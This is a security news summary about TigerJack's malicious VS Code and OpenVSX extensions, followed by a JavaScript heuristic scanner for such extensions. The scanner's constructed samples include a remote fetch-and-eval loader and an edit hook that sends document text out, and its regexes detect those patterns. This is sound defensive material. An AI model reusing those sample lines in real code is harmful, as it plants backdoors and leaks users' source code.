A threat actor known as TigerJack is persistently targeting developers with harmful extensions on both the VSCode Marketplace and the OpenVSX registry. At least 11 malicious extensions have been distributed this year, with some removed from Microsoft's marketplace still available on OpenVSX. Two notable examples, "C++ Playground" and "HTTP Format," were downloaded 17,000 times before being taken down, only to be republished under new names.
The "C++ Playground" extension steals source code by exfiltrating keystrokes shortly after edits are made. "HTTP Format" functions as a legitimate tool but secretly runs a cryptocurrency miner that consumes the host's full processing power without restraint. A third, more dangerous category of extensions fetches and executes remote JavaScript code every 20 minutes, allowing dynamic deployment of ransomware or backdoors.
TigerJack disguises these attacks by creating multiple fake developer accounts with convincing branding and documentation. Despite reports from security researchers, the malicious extensions remain available on the OpenVSX registry. Developers are strongly advised to download extensions only from verified and reputable publishers to avoid compromise.
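The behaviours described above (periodic fetch-and-execute of remote JavaScript, and exfiltration of code shortly after edits) can be triaged in an extension's unpacked sources before it is trusted. The following is an added example, not code from the report or from any of the extensions; the regex patterns, finding names and sample inputs are assumptions made for illustration.

```javascript
// Added example: heuristic static triage of an extension's JavaScript sources.
// The patterns are illustrative assumptions, not indicators from the report.
const RULES = {
  network: /\b(fetch|axios(\.\w+)?|https?\.(get|request))\s*\(/,
  dynamicExec: /\beval\s*\(|\bnew\s+Function\s*\(|\bvm\.(runInThisContext|runInNewContext|runInContext)\s*\(/,
  timer: /\bsetInterval\s*\(/,
  editHook: /\bonDidChangeTextDocument\s*\(/, // VS Code event fired on every edit
};

// files: object mapping a file path to its source text.
function auditExtension(files) {
  const hits = {};
  for (const name of Object.keys(RULES)) hits[name] = [];
  for (const [path, source] of Object.entries(files)) {
    for (const [name, pattern] of Object.entries(RULES)) {
      if (pattern.test(source)) hits[name].push(path);
    }
  }
  const findings = [];
  // Downloading text and evaluating it lets the publisher change behaviour
  // after review; on a timer it becomes a standing update channel.
  if (hits.network.length && hits.dynamicExec.length) {
    findings.push({
      id: 'remote-code-loader',
      severity: hits.timer.length ? 'high' : 'medium',
      files: [...new Set([...hits.network, ...hits.dynamicExec, ...hits.timer])],
    });
  }
  // Edit listeners are common in legitimate extensions, so this is only a
  // prompt to check where the document text is sent.
  if (hits.editHook.length && hits.network.length) {
    findings.push({
      id: 'edit-content-egress',
      severity: 'review',
      files: [...new Set([...hits.editHook, ...hits.network])],
    });
  }
  return findings;
}

// Constructed sample inputs (not taken from any real extension).
const SAMPLE_LOADER = { 'extension.js':
  'setInterval(async () => { const r = await fetch(UPDATE_URL); eval(await r.text()); }, 20 * 60 * 1000);' };
const SAMPLE_EDIT_HOOK = { 'extension.js':
  'vscode.workspace.onDidChangeTextDocument(e => https.request(opts).end(e.document.getText()));' };
const SAMPLE_BENIGN = { 'extension.js':
  'vscode.commands.registerCommand("fmt.run", () => format(editor));' };

console.log(auditExtension(SAMPLE_LOADER));
```

Minified or obfuscated bundles will not match these patterns, so an empty result is not a clean bill of health.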
